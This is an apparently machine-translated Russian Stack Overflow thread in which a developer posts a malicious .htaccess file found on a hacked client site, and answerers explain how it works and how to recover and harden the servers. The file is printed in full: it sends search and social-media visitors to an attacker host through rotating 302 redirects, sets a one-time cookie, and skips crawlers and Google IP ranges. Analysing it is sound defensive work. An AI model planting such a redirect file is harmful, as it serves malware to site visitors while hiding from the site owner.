2012-12-12 4 views
7

Один из наших сайтов клиентов взломан, а файлы .htaccess заменены следующим.htaccess клиентского сайта взломан - не совсем уверен, что это делает или что делать дальше

Может ли кто-нибудь сломать именно то, что это делает?

Насколько мне известно, он принимает реферальную страницу, затем пользовательский агент, устанавливает куки-файл под названием jpg и затем перенаправляет вас на siknsty.malicioussite.com, который затем пытается загрузить некоторые вредоносные программы, прежде чем ссылаться на (например, ваш путь Google> Страница вредоносных программ> Google)

Если установлен файл jpg cookie, он не ссылается на вас нигде, так как предполагает, что вы уже загрузили вредоносное ПО. (это может быть неправильно - я думаю, он должен ссылаться на страницы, перечисленные ниже, где он перенаправляется).

Я не уверен насчет остальных, или если он использует .htaccess, чтобы замаскировать файлы почтового индекса, как JPGs (я думаю, что я читаю, что справа) ...

Любые идеи кто-нибудь?

Кроме того, любые идеи, как это возникло на сервере? Разрешения для всех были установлены в 0644, и это произошло на обоих серверах Windows и Linux под одной учетной записью.

Утренний утренний баллаш ahoy.

О, и не заходите на этот сайт.

<IfModule prefork.c> 
RewriteEngine On 
RewriteCond %{REQUEST_METHOD} ^GET$ 
RewriteCond %{HTTP_REFERER}  ^(http\:\/\/)?([^\/\?]*\.)?  (tweet|twit|linkedin|instagram|facebook\.|myspace\.|bebo\.).*$ [NC,OR] 
RewriteCond %{HTTP_REFERER}  ^(http\:\/\/)?([^\/\?]*\.)?(hi5\.|blogspot\.|friendfeed\.|friendster\.|google\.).*$ [NC,OR] 
RewriteCond %{HTTP_REFERER}  ^(http\:\/\/)?([^\/\?]*\.)?(yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.).*$ [NC,OR] 
RewriteCond %{HTTP_REFERER}  ^(http\:\/\/)?([^\/\?]*\.)?(aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.).*$ [NC,OR] 
RewriteCond %{HTTP_REFERER}  ^(http\:\/\/)?([^\/\?]*\.)?(lycos\.|metacrawler\.|mail\.|pinterest|instagram).*$ [NC] 
RewriteCond %{HTTP_REFERER}  !^.*(imgres).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|IRIX|Jakarta|JetBrains).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|macDN|Mediapartners|Megite|MetaProducts).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC] 
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC] 
RewriteCond %{REMOTE_ADDR}  !^66\.249.*$ [NC] 
RewriteCond %{REMOTE_ADDR}  !^74\.125.*$ [NC] 
RewriteCond %{HTTP_COOKIE}  !^.*Jpg.*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} .*(Windows|Macintosh|iPad|iPhone|iPod|Android).* [NC] 
RewriteCond %{HTTPS}  ^off$ 
RewriteRule .* - [E=Jpg:%{TIME_SEC}] 
RewriteRule .* - [E=HjT:siknsty.autoeventregistration.com] 

RewriteCond %{ENV:Jpg} 0 
RewriteRule ^.* http://%{ENV:HjT}/lg.php?bannerid=2168&campaignid=1049&zoneid=54&loc=1&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=3dc202f6d9 [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9516:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 1 
RewriteRule ^.* http://%{ENV:HjT}/www/app_full_proxy.php?app=275724075798066&v=1&size=z&cksum=e086bd606215518aed83711368bbecf5&src=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:11607:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 2 
RewriteRule ^.* http://%{ENV:HjT}/__utm.gif?utmwv=5.3.3&utms=10&utmn=620248474&utmhn=malang.olx.co.id&utme=8(2!entryPage)9(2!jobs/staticsearch/190\%3Fsearchbox\%3Dretailer\%26section\%3Dst-190)11(2!1)&utmcs=UTF-8&utmsr=1024x768&utmvp=1024x638&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.3\%20r181&utmdt=Gambar\%20MAZDA\%20MR\%20TAHUN\%201992.\%20BIRU\%20-\%20Malang\%20-\%20Mobil&utmhid=312516024&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=vehicles/itemimages/withImg/0&utmac=UA-1240664-1&utmcc=__utma\%3D209359949.1036501994.1340939688.1340939688.1340955051.2\%3B\%2B__utmz\%3D209359949.1340955051.2.2.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dgambar\%2520mobil\%2520mazda\%2520th\%25201992\%3B&utmu=ujGgAAAAIAAAAAAAAAAAAAB~ [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9398:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 3 
RewriteRule ^.* http://%{ENV:HjT}/_xhr/ugccomments/?method=get_context_uuid&context_id=8064b73e-890d-3876-9ce5-c5f7c98574aa&0.2617028157370842&baseurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9127:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 4 
RewriteRule ^.* http://%{ENV:HjT}/ping?h=thefrisky.com&p=/photos/357-12-stars-who-regret-having-plastic-surgery/lisa-rinna-lips-m-jpg-2/&u=i5r1cquurwfzcui1&d=thefrisky.com&g=25328&n=1&f=1&c=0&x=114&y=1865&w=638&j=45&R=1&W=0&I=0&E=0&v=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&b=4187&t=72n4jkji2m79sf6m&V=6&D=nygdmayh2yyvp9w3&i=12\%20Stars\%20Who\%20Regret\%20Having\%20Plastic\%20Surgery\%20Lisa\%20Rinna\%20\%E2\%80\%93\%20The\%20Frisky&_ [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:11948:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 5 
RewriteRule ^.* http://%{ENV:HjT}/__utm.gif?utmwv=5.3.2&utms=3&utmn=490784565&utmhn=www.wego.co.id&utme=8(2!Hotels*Google\%20search\%20position)9(2!Details\%20Overview*5)&utmcs=UTF-8&utmsr=1024x768&utmvp=1007x612&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=11.2\%20r202&utmdt=Aston\%20Cengkareng\%20City\%20Hotel\%20\%26\%20Conference\%20Center\%2C\%20Jakarta\%20-\%20Bandingkan\%20tarif\%20kamar\%20-\%20Wego.co.id&utmhid=1324439502&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/hotel/indonesia/jakarta/aston-cengkareng-city-hotel-and-conference-center--133090&utmac=UA-29994605-1&utmcc=__utma\%3D1.786375144.1340094774.1340094774.1340094774.1\%3B\%2B__utmz\%3D1.1340094774.1.1.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dstandard\%2520superior\%2520twin\%2520room\%2520aston\%2520hotel\%3B&utmu=qzGggCAAAAAAAAAAAAAAAAB~ [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:10955:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 6 
RewriteRule ^.* http://%{ENV:HjT}/delivery/lg.php?bannerid=30550&campaignid=4402&zoneid=1917&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=dbd1f7d293 [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9621:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 7 
RewriteRule ^.* http://%{ENV:HjT}/api/getCount2.php?cb=stButtons.processCB&refDomain=www.mangahere.com&refQuery=manga/fly_high/v03/c013/37.html&pgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pubKey=e47efe7d-147b-4731-ac42-9838ccdc52f2&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:10798:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 8 
RewriteRule ^.* http://%{ENV:HjT}/pingjs/?k=f6ckilz7r2ss&t=Komik\%20Fairy\%20Tail\%20\%7C\%20Chapter\%20288\%20289\%20Hal\%2016\%20-\%20Baca\%20Manga\%20Bahasa\%20Indonesia\%20Online&c=s&y=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&a=-1&r=978836 [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:11234:/:0:HttpOnly] 
<!-- Conditions 10 - 58 removed to post on stackoverflow --> 
RewriteCond %{ENV:Jpg} 59 
RewriteRule ^.* http://%{ENV:HjT}/delivery/lg.php?bannerid=31662&campaignid=2&zoneid=1884&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=af167e7f1f [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9285:/:0:HttpOnly] 

</IfModule> 
#a77342b1677255ef6afc9a0dbec166f633c2b44166559458c71fb4e7 

ответ

8

Он выбирает одну из переадресаций в случайном порядке в зависимости от второго времени. Следовательно, почему они идут от 0 до 59.

Я думаю, вы правы, что он устанавливает cookie, чтобы он не делал то же самое снова с той же жертвой.

Первый куча правил делает такие вещи, как устранение всех, кто запрашивает файл, заканчивающийся на .jpg, .zip и т. Д., Возможно, чтобы убедиться, что это кто-то действительно смотрит в браузер, прежде чем перенаправляет его. Пользовательские агенты также являются исключениями (обратите внимание на! В начале каждой строки) - различные веб-пауки, а также некоторые операционные системы и клиенты, которых он не интересует или не может заразить. Он также требует, чтобы агент пользователя, чтобы включить один из

Windows|Macintosh|iPad|iPhone|iPod|Android 

и реферер быть один из длинного списка имен популярных сайтов и поисковых систем. Это может быть снова, чтобы удостовериться, что за браузером есть человек, если им платят за спам, или это может быть связано с использованием вашего сайта, например, для щелчка на ферме.

Интересная вещь, список блоков IP, что он игнорирует:

RewriteCond %{REMOTE_ADDR}  !^66\.249.*$ [NC] 
RewriteCond %{REMOTE_ADDR}  !^74\.125.*$ [NC] 

Они могут включать в себя адрес сайта, так что владельцы сайта (потенциально) не замечают повреждения, или его может дать вам представление о том, в какой стране находятся ваши злоумышленники.

+0

большое спасибо за объяснение. – user1897900

+0

Тот факт, что файлы .htaccess были изменены, может указывать на то, что злоумышленники имели доступ только к имени пользователя клиента или только к тому набору каталогов. Если бы они имели корневой доступ или могли писать файлы в любом месте, они, вероятно, могли бы сделать что-то еще хуже. – jwg

2

Вместо того, чтобы быть атакой прямой/дефолтной, это хитрый способ бесшумного внедрения вредоносного ПО, что не очевидно для конечного пользователя.

Похоже, что на велосипеде случайно на основе времени ...(Которые вы, очевидно, каким-то образом к пониманию):

  1. Возьмите сайт вниз, пока вы не поймете его
  2. Сравнить/Восстановление из последней резервной копии и посмотреть, что еще было изменено по системе
  3. Проверьте файлы журналов
  4. Блокировка всех учетных записей на основе сервера и цикл все пароли

Там целый ряд возможных способов, в которых это произошло, в том числе:

  1. Учетная запись сервера была принудительно принудительной (например, ftp/telnet/пользователь или другая общая учетная запись)
  2. Ваш код предоставил/создал лазейку, через которую кто-то получил доступ (хотя, если ваши разрешения установлены на 644, то они, вероятно, получили доступ к учетной записи root/user так или иначе, они не смогут перезаписывать файлы).
  3. Устаревшее программное обеспечения (с отверстием (ы) безопасности) была эксплуатируемым
  4. контрейлерные на счету сессии небезопасным пользователя

Вот несколько общих элементов, чтобы помочь избежать подобных подвигов, хотя можно найти методологии безопасности в Интернете, чтобы заблокировать Linux/выиграть серверов:

  • Установка натяжного на ключевых системных файлов (один открытый вариант источника:)
  • Установка программного обеспечения/SECUR Обновления итх (Secunia является давним источником новых проблем)
  • Удаления/все ненужная выемка счета/услуги
  • Использования оборудования на границе сети для защиты серверов от внешнего доступа (например. Маршрутизатор с интеллектуальными функциями безопасности - хотя это дорого)
  • Блокирование доступа к серверу от статического IP-диапазонов, кроме тех, которые вы используете
  • тестирование проникновения поведения, чтобы найти слабые места, что ваш сервер (ы) есть, и закрыть их
  • Удалить внешний доступ, блокируя попытки по счетам после н пытается с помощью IPTables или эквивалент
+1

Отлично - большое спасибо за ваш совет. В настоящий момент я вынимаю полную копию серверов и вернусь к клиенту с советами. – user1897900